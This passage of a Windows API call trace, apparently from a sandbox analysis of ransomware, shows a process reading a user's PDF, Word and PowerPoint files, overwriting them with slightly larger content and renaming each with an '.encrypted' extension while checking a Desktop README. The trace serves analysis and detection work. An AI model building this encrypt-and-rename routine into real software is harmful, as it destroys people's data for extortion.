lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x1766a [0152.076] ReadFile (in: hFile=0x4d0, lpBuffer=0x3a90d10, nNumberOfBytesToRead=0x1766a, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x3a90d10*, lpNumberOfBytesRead=0x2ee894*=0x1766a, lpOverlapped=0x0) returned 1 [0152.079] CloseHandle (hObject=0x4d0) returned 1 [0152.101] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.101] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.102] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gke7Hh05Yah.pdf", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gke7Hh05Yah.pdf", lpFilePart=0x0) returned 0x37 [0152.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gke7Hh05Yah.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gke7hh05yah.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.103] GetFileType (hFile=0x4d0) returned 0x1 [0152.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.103] GetFileType (hFile=0x4d0) returned 0x1 [0152.103] WriteFile (in: hFile=0x4d0, lpBuffer=0x3b05d78*, nNumberOfBytesToWrite=0x17670, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x3b05d78*, lpNumberOfBytesWritten=0x2ee884*=0x17670, lpOverlapped=0x0) returned 1 [0152.105] CloseHandle (hObject=0x4d0) returned 1 [0152.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gke7Hh05Yah.pdf", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gke7Hh05Yah.pdf", lpFilePart=0x0) returned 0x37 [0152.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gke7Hh05Yah.pdf.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gke7Hh05Yah.pdf.encrypted", lpFilePart=0x0) returned 0x41 [0152.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.107] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gke7Hh05Yah.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gke7hh05yah.pdf"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa180a720, ftCreationTime.dwHighDateTime=0x1d5e4be, ftLastAccessTime.dwLowDateTime=0xccf441f0, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0x419fc180, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x17670)) returned 1 [0152.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.107] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gke7Hh05Yah.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gke7hh05yah.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gke7Hh05Yah.pdf.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gke7hh05yah.pdf.encrypted")) returned 1 [0152.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GQnlDqiYaM01tswsYqy.pdf", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GQnlDqiYaM01tswsYqy.pdf", lpFilePart=0x0) returned 0x3f [0152.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GQnlDqiYaM01tswsYqy.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gqnldqiyam01tswsyqy.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.111] GetFileType (hFile=0x4d0) returned 0x1 [0152.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.111] GetFileType (hFile=0x4d0) returned 0x1 [0152.111] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x60a1 [0152.112] ReadFile (in: hFile=0x4d0, lpBuffer=0x24cac50, nNumberOfBytesToRead=0x60a1, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x24cac50*, lpNumberOfBytesRead=0x2ee894*=0x60a1, lpOverlapped=0x0) returned 1 [0152.113] CloseHandle (hObject=0x4d0) returned 1 [0152.132] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.132] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.133] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GQnlDqiYaM01tswsYqy.pdf", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GQnlDqiYaM01tswsYqy.pdf", lpFilePart=0x0) returned 0x3f [0152.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.133] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GQnlDqiYaM01tswsYqy.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gqnldqiyam01tswsyqy.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.134] GetFileType (hFile=0x4d0) returned 0x1 [0152.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.134] GetFileType (hFile=0x4d0) returned 0x1 [0152.134] WriteFile (in: hFile=0x4d0, lpBuffer=0x2535d70*, nNumberOfBytesToWrite=0x60b0, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x2535d70*, lpNumberOfBytesWritten=0x2ee884*=0x60b0, lpOverlapped=0x0) returned 1 [0152.135] CloseHandle (hObject=0x4d0) returned 1 [0152.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GQnlDqiYaM01tswsYqy.pdf", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GQnlDqiYaM01tswsYqy.pdf", lpFilePart=0x0) returned 0x3f [0152.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GQnlDqiYaM01tswsYqy.pdf.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GQnlDqiYaM01tswsYqy.pdf.encrypted", lpFilePart=0x0) returned 0x49 [0152.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.136] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GQnlDqiYaM01tswsYqy.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gqnldqiyam01tswsyqy.pdf"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c949040, ftCreationTime.dwHighDateTime=0x1d5e0fb, ftLastAccessTime.dwLowDateTime=0x69bbdae0, ftLastAccessTime.dwHighDateTime=0x1d5df59, ftLastWriteTime.dwLowDateTime=0x41a48440, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x60b0)) returned 1 [0152.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.136] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GQnlDqiYaM01tswsYqy.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gqnldqiyam01tswsyqy.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GQnlDqiYaM01tswsYqy.pdf.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gqnldqiyam01tswsyqy.pdf.encrypted")) returned 1 [0152.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I9b4Uj.doc", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I9b4Uj.doc", lpFilePart=0x0) returned 0x32 [0152.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.139] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I9b4Uj.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i9b4uj.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.140] GetFileType (hFile=0x4d0) returned 0x1 [0152.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.140] GetFileType (hFile=0x4d0) returned 0x1 [0152.140] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x149a3 [0152.141] ReadFile (in: hFile=0x4d0, lpBuffer=0x253c358, nNumberOfBytesToRead=0x149a3, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x253c358*, lpNumberOfBytesRead=0x2ee894*=0x149a3, lpOverlapped=0x0) returned 1 [0152.143] CloseHandle (hObject=0x4d0) returned 1 [0152.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.164] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I9b4Uj.doc", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I9b4Uj.doc", lpFilePart=0x0) returned 0x32 [0152.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I9b4Uj.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i9b4uj.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.166] GetFileType (hFile=0x4d0) returned 0x1 [0152.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.166] GetFileType (hFile=0x4d0) returned 0x1 [0152.166] WriteFile (in: hFile=0x4d0, lpBuffer=0x25c6e2c*, nNumberOfBytesToWrite=0x149b0, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x25c6e2c*, lpNumberOfBytesWritten=0x2ee884*=0x149b0, lpOverlapped=0x0) returned 1 [0152.168] CloseHandle (hObject=0x4d0) returned 1 [0152.169] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I9b4Uj.doc", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I9b4Uj.doc", lpFilePart=0x0) returned 0x32 [0152.169] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I9b4Uj.doc.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I9b4Uj.doc.encrypted", lpFilePart=0x0) returned 0x3c [0152.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.169] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I9b4Uj.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i9b4uj.doc"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbbab7d0, ftCreationTime.dwHighDateTime=0x1d5d857, ftLastAccessTime.dwLowDateTime=0x319e110, ftLastAccessTime.dwHighDateTime=0x1d5d83d, ftLastWriteTime.dwLowDateTime=0x41a94700, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x149b0)) returned 1 [0152.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.169] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I9b4Uj.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i9b4uj.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I9b4Uj.doc.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i9b4uj.doc.encrypted")) returned 1 [0152.172] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KWnLqD jTsie6.docx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KWnLqD jTsie6.docx", lpFilePart=0x0) returned 0x3a [0152.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.172] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KWnLqD jTsie6.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwnlqd jtsie6.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.173] GetFileType (hFile=0x4d0) returned 0x1 [0152.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.173] GetFileType (hFile=0x4d0) returned 0x1 [0152.173] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x6582 [0152.173] ReadFile (in: hFile=0x4d0, lpBuffer=0x25dbcbc, nNumberOfBytesToRead=0x6582, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x25dbcbc*, lpNumberOfBytesRead=0x2ee894*=0x6582, lpOverlapped=0x0) returned 1 [0152.175] CloseHandle (hObject=0x4d0) returned 1 [0152.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.194] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.195] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KWnLqD jTsie6.docx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KWnLqD jTsie6.docx", lpFilePart=0x0) returned 0x3a [0152.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KWnLqD jTsie6.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwnlqd jtsie6.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.196] GetFileType (hFile=0x4d0) returned 0x1 [0152.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.196] GetFileType (hFile=0x4d0) returned 0x1 [0152.196] WriteFile (in: hFile=0x4d0, lpBuffer=0x264863c*, nNumberOfBytesToWrite=0x6590, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x264863c*, lpNumberOfBytesWritten=0x2ee884*=0x6590, lpOverlapped=0x0) returned 1 [0152.197] CloseHandle (hObject=0x4d0) returned 1 [0152.198] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KWnLqD jTsie6.docx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KWnLqD jTsie6.docx", lpFilePart=0x0) returned 0x3a [0152.198] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KWnLqD jTsie6.docx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KWnLqD jTsie6.docx.encrypted", lpFilePart=0x0) returned 0x44 [0152.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.198] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KWnLqD jTsie6.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwnlqd jtsie6.docx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3789e7e0, ftCreationTime.dwHighDateTime=0x1d597e4, ftLastAccessTime.dwLowDateTime=0x9b276270, ftLastAccessTime.dwHighDateTime=0x1d5a5de, ftLastWriteTime.dwLowDateTime=0x41ae09c0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x6590)) returned 1 [0152.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.198] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KWnLqD jTsie6.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwnlqd jtsie6.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KWnLqD jTsie6.docx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwnlqd jtsie6.docx.encrypted")) returned 1 [0152.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mjKxv.pptx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mjKxv.pptx", lpFilePart=0x0) returned 0x32 [0152.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.221] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mjKxv.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mjkxv.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.280] GetFileType (hFile=0x4d0) returned 0x1 [0152.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.280] GetFileType (hFile=0x4d0) returned 0x1 [0152.280] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0xd9f1 [0152.281] ReadFile (in: hFile=0x4d0, lpBuffer=0x264f0dc, nNumberOfBytesToRead=0xd9f1, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x264f0dc*, lpNumberOfBytesRead=0x2ee894*=0xd9f1, lpOverlapped=0x0) returned 1 [0152.282] CloseHandle (hObject=0x4d0) returned 1 [0152.305] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.305] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.306] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mjKxv.pptx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mjKxv.pptx", lpFilePart=0x0) returned 0x32 [0152.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mjKxv.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mjkxv.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.307] GetFileType (hFile=0x4d0) returned 0x1 [0152.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.307] GetFileType (hFile=0x4d0) returned 0x1 [0152.307] WriteFile (in: hFile=0x4d0, lpBuffer=0x26c4ca0*, nNumberOfBytesToWrite=0xda00, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x26c4ca0*, lpNumberOfBytesWritten=0x2ee884*=0xda00, lpOverlapped=0x0) returned 1 [0152.309] CloseHandle (hObject=0x4d0) returned 1 [0152.310] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mjKxv.pptx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mjKxv.pptx", lpFilePart=0x0) returned 0x32 [0152.310] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mjKxv.pptx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mjKxv.pptx.encrypted", lpFilePart=0x0) returned 0x3c [0152.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.310] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mjKxv.pptx" (normalized: "c:\\users\\5p5nrgjn0js 